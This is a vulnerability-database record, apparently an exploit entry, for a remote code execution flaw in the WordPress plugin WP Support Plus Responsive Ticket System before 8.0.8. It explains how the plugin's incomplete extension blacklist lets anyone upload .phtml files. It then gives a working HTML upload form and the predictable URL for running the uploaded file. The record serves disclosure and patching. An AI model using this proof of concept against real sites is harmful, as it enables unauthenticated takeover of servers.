{"id": "WPEX-ID:85D3126A-34A3-4799-A94B-76D7B835DB5F", "type": "wpexploit", "bulletinFamily": "exploit", "title": "WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution", "description": "WP Support Plus Responsive Ticket System <= 8.0.7 allows anyone to upload PHP files with extensions like \".phtml\", \".php4\", \".php5\", and so on, all of which are run as if their extension was \".php\" on most hosting platforms. This is because \"includes/admin/attachment/uploadAttachment.php\" contains this code: switch ($extension){ case 'exe': case 'php': case 'js': $isError=true; $errorMessege=__('Error: file format not supported!','wp-support-plus-responsive-ticket-system'); But it does not check for other extensions like \".phtml\". In addition, it saves the file with a predictable name based on the timestamp, and anyone can load the file and run the code it contains. Plugin author notified 2017-11-09.\n", "published": "2017-11-12T00:00:00", "modified": "2020-09-22T08:34:37", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Robert Mathews", "references": ["https://plugins.trac.wordpress.org/changeset/1763596"], "cvelist": [], "lastseen": "2021-02-15T22:15:27", "viewCount": 0, "enchantments": {"dependencies": {"references": [], "modified": "2021-02-15T22:15:27", "rev": 2}, "score": {"value": -0.7, "vector": "NONE", "modified": "2021-02-15T22:15:27", "rev": 2}, "vulnersScore": -0.7}, "sourceData": "<form method=\"post\" enctype=\"multipart/form-data\" action=\"https://example.com/wp-admin/admin-ajax.php\">\r\n\u00a0\u00a0 \u00a0<input type=\"hidden\" name=\"action\" value=\"wpsp_upload_attachment\">\r\n\u00a0\u00a0 \u00a0Choose a file ending with .phtml:\r\n\u00a0\u00a0 \u00a0<input type=\"file\" name=\"0\">\r\n\u00a0\u00a0 \u00a0<input type=\"submit\" value=\"Submit\">\r\n</form>\r\n\r\nAfter doing this, an uploaded file can be accessed at, say:\r\n\r\nhttp://example.com/wp-content/uploads/wpsp/1510248571_filename.phtml\r\n", "generation": 1, "immutableFields": []}

{}